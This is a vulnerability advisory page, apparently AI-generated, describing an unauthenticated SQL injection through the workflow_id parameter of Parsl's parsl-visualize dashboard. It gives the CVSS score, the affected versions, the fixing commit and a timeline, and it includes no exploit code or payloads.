CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Dashboard
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad

GHSA-F2MF-Q878-GH58
8.6

Parsl Tongue: SQL Injection in High-Performance Computing Visualization

Alon Barad
Alon Barad
Software Engineer

Jan 6, 2026·6 min read·5 visits

PoC Available

Executive Summary (TL;DR)

The 'parsl-visualize' dashboard fails to sanitize the 'workflow_id' URL parameter before passing it to a raw SQL query. This allows unauthenticated remote attackers to execute arbitrary SQL commands via Boolean-based blind injection. The vulnerability affects all versions prior to the January 5, 2026 patch.

Parsl, a parallel scripting library for Python often used in academic and high-performance computing (HPC) environments, contains a critical SQL injection vulnerability in its monitoring dashboard. The flaw allows unauthenticated attackers to manipulate database queries via the visualization interface, potentially exposing sensitive workflow metadata and environment configurations.

Official Patches

ParslCommit fixing the SQL injection

Fix Analysis (1)

Technical Appendix

CVSS Score
8.6/ 10
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L

Affected Systems

Parsl (Python Parallel Scripting Library)parsl-visualize dashboard

Affected Versions Detail

Product
Affected Versions
Fixed Version
Parsl
Parsl
< Commit 013a928461e70f38a33258bd525a351ed828e974Commit 013a928461e70f38a33258bd525a351ed828e974
AttributeDetail
CWE IDCWE-89 (SQL Injection)
Attack VectorNetwork (Web Dashboard)
CVSS Score8.6 (High)
Affected Componentparsl.monitoring.visualization
Exploit StatusPoC Available
AuthenticationNone Required

MITRE ATT&CK Mapping

T1190Exploit Public-Facing Application
Initial Access
T1059Command and Scripting Interpreter
Execution
CWE-89
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

The software constructs all or part of an SQL command using an input that might be influenced by an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component.

Known Exploits & Detection

ManualBoolean-based blind injection via workflow_id URL parameter

Vulnerability Timeline

Fix committed to master branch
2026-01-05
GitHub Advisory Published
2026-01-06

References & Sources

  • [1]GHSA Advisory
  • [2]Pull Request #4049

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.